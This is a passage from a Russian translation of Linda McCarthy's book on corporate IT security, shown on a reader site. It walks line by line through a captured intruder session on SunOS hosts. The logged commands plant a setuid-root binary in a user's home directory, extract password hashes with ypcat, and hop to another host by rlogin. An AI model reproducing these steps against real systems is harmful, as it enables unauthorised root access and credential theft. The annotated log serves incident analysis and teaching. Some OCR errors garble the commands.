IT-безопасность: стоит ли рисковать корпорацией?, Маккарти Линда

IT-безопасность: стоит ли рисковать корпорацией?

на обложку

Маккарти Линда

Шрифт:

Строки с № 213 по № 227

Хакер проверяет, какие файловые системы подмонтированы.

198 #4)

199 # id

200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff)

201 # тс^С

202 # mv^С

203 #mv a.out shit

204 # Is — tal

205 total 2415

206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.

207 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

208-rw-r-r- 1 root 61 Jan 18 23:11 c.c

209 — rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa

210#rmaaa

211 #rmc.c

212 rm: override protection 644 for c.c?

213 #df

214 Filesystem kbytes used avail capacity Mounted on

215 /dev/sdOa 10483 5081 4354 54 % /

216 /dev/sdOg 96943 78335 8914 90 % /usr

217 /dev/sdOe 22927 3111 17524 15 %/var

218 /dev/sd1h 1255494 1081249 48696 96 % /home

219 /dev/sd3h 1255494 1030386 99559 91 % /home/se

220 la:/usr/local 2097151 1154033 692365 63 % /usr/local

221 suntzu:/var/spool/mail

222 445852 334295 66972 83 % /var/spool/mail

223 mfp:/home/sybase 318991 244337 42755 85 % /home/sybase

224 арр1:/export/sun/sun4/openwin-3,0

225 189858 131073 39799 77 % /usr/openwin

226 арр1:/export/apps 1255494 771887 358057 68 % /export/apps

227 appl:/export/apps 1255494 771887 358057 68 % /usr/local

Строки с № 228 по № 229

Неверный ввод или, возможно шумы в линии.

Строки с № 230 по № 258

Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользователем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать пользователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se

229 irG-cd: not found

230 # cd/home/se

231 # Is

232 cmeyer hamant lost+found mikec wendy

233 colleen Joseph mark mikep

234 derek kevin matthews neally

235 # cd wendy

236 # cp Дтр/shit.

237 # Is — tal shit

238 — rwxr-xr-x 1 root 24576 Jan 18 23:13 shit

239 # chmod 6777 shit

240 # Is — tal shit

241 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit

242 # pwd

243 /home/se/wendy

244 # cd Amp

245 # Is — tal | more

246 total 2398

247 drwxrwsrwx 3 bin 1024 Jan 18 23:13.

248 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

249 — rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk

250-rw-r-r- 1 cmeyer 12 Jan 13 12:05 junk.dat

251 — rw-r-r- 1 derek 0 Jan 12 16:07 6310

252 (16 строк вывода удалены и хакер стал пользователем wendy)

253 hacker typos

254 # rm shit

255 # grep dan/etc/passwd

256 # ypcat passwd | grep dan

257danf:*:13602:50::/home/guest/danf:/bin/csh

258 dan:*H.6Haolt2xDu2:13601:50:&:/home/guest/dan:/bin/csh

Строки

с № 259 по № 263

Еще несколько тревожных взглядов вокруг (с помощью who).

Строки с № 264 по № 273

Он снова превращается в jeff. Очевидно, что реальный jeff был в системе немного раньше хакера, который входит сейчас в suntzu как jeff. И снова пароля не требуется.

Строка № 274

Другая смена оболочки, чтобы не оставлять отметки о себе в журналах history.

Строки с № 275 по № 281

Хакер пытается убедиться, что /home/se подмонтирован из хоста tsunami. (Если вы помните, в /home/se/wendy он оставил свой исполняемый код. Ему это было нужно для получения доступа с правами суперпользователя к этому новому хосту.)

259 # who

260 wendy ttyp2 Jan 6 13:55 (arawana)

261 derekttyp3Jan 13 17:57 (lajolla)

262 derek ttyp4 Jan 15 13:11 (lajolla)

263 jeff ttyp5 Jan 18 23:09 (valley)

264 #T>

265 $ id

266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)

267 $ rlogin suntzu

268 Last login: Thu Jan 14 06:35:30 on ttyhl

269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992

270 You have new mail.